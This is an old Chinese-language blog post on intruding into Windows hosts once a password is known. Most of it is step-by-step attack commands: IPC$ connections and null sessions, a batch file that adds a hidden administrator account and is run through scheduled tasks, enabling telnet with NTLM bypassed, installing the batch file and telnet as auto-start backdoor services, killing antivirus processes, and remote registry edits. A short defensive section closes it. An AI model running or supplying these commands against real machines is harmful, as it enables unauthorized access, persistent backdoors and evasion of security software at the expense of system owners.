基于认证的入侵--sagely's blog

基于认证的入侵- -

                                      

当前网络设备基本上都是依靠"认证"来实现身份识别和安全防范，基于"帐号/密码"的人证最为常见。下面我们是假设一台主机的帐号或密码被掌握后进行的攻击。当然这也可以作为当利用系统某些漏洞以管理员身份进行系统后的一些入侵手段。

  一：IPC$攻击
1，建立IPC$连接：net use \\IP\ IPC$ "password" /user:"username"

 

2，映射网络驱动器：net use z: \\IP\C$

 

3，建立批处理文件：（另存为add.bat）

 

增加用户：net user username password /add

 

增加组的权限：net localgroup administrators username /add

 

4，拷贝至远程机器：copy add.bat \\IP\D

 

5，获取远程机器时间：net time \\IP

 

6，为远程机器新建任务：at \\IP hh:mm d:\add.bat

 

7，关闭IPC$连接：net use * /delete

 

到这里已经可以发现给远程机器添加了一个具有administrator权限的用户

 

8，删除用户：net user username /delete

 

9，删除文件：del \\IP\d\add.bat

 

上面是建立在知道用户名和密码的基础上的，
不知道用户名和密码的话可以尝试建立空IPC$连接： net use \\IP\ IPC$ "" /user:"" ，这样也可以得到远程机器的一些信息。

 

 

 

二：telnet入侵：

 

1，为远程机器开启telnet服务并且进行telent登陆，这个主要有下面几种方法
    

 

1，这个可以依照我们上面的办法，无非是写.bat文件（net start telnet），然后新建任务令其执行，但是开启telnet服务后直接用telnet IP命令是不行的。由于telnet功能实在是太强大，而且入侵者使用最频繁的登陆手段之一，因此微软为telnet添加了身份验证，成为NTLM验证，故要进行telnet攻击，必须先绕过NTLM验证。在本地计算机上建立一个与远程电脑上相同的帐号和密码。开始->程序->附件->命令提示符里面把以其它用户身份运行点上。再一次启动命令提示符，选上刚刚添加的帐号就可以用telnet IP这个命令了
     2，使用软件命令，netsvc \\IP telnet/start 我没有试过不知道行不行

 

     3，使用软件命令，opentelnet \\IP username  password  NTLM验证方式(0,1,2)设置的端口号。这样就可以取消NTLM的验证，并且将telnet的服务端口更改了。假如需要恢复NTLM验证，使用命令 resumetelnet \\IP name password

 

当可以使用telnet以后，下面的任务就简单了，能进行所有的命令了，下面介绍比较常用的进一步设置后门的办法。
    

 

1，利用IPC$将文件add.bat,，aproman.exe，instsrv.exe拷贝到远程电脑中
    

 

2，用telnet命令将上面三个文件全部剪切至system32下，并且换个名字。
    

 

3，将add.bat设置为系统的自动服务，instsrv 服务名称 c:\winnt\system32\add.bat

 

4，将telnet服务设置为系统的自动服务，instsrv 服务名称 c:\winnt\system32\tlntsvr.exe

 

假若远程电脑有防火墙病毒软件之类的，可以直接用aproman.exe查看，并且结束进程

 

若要移除服务，可用instsrv 服务名 remove

 

 三：远程修改注册表（写.reg文件，然后直接用regedit /s reg文件名命令执行）

 

1，添加主键

 

REGEDIT4

 

[HKEY_CURRENT_USER\Software\HACK]

 

2，添加键值项

 

"NAME"=DWORD:00000000

 

3，删除键值项

 

REGEDIT4

 

[HKEY_CURRENT_USER\Software\HACK]

 

"NAME"=-

 

4，删除主键

 

REGEDIT4

 

[-HKEY_CURRENT_USER\Software\HACK]

 

 

 

解决办法：现在我们从上面可以看出密码的重要性了，其实一切攻击来源于管理员的疏忽以及共享资源的设置。

 

1，删除默认的共享资源，这样有下面几种方法：
   

 

1，net share ipc$ /del , 不过这种方法在重启后就无效了，建议写成.bat文件，每次开机均运行。
   

 

2，修改注册表2000服务器下[HEKY_LOCAL_MACHINE\SYSTEM\CurrentControl\Service\Lanmanservers\parameters]

 

新建：AutoShareServer，DWORD，0。工作站下：AutoShareWks,若要恢复则将该键删除即可
   

 

3，关闭server服务，不过这样就不太适合于服务器，只适合于个人版

 

2，保证帐号密码的强壮性，防止被暴力破解

 

3，使用netstat -an检查开放的端口，把不必要的端口全部关掉

 

4，检查本机已经启动的服务项目，禁用telnet服务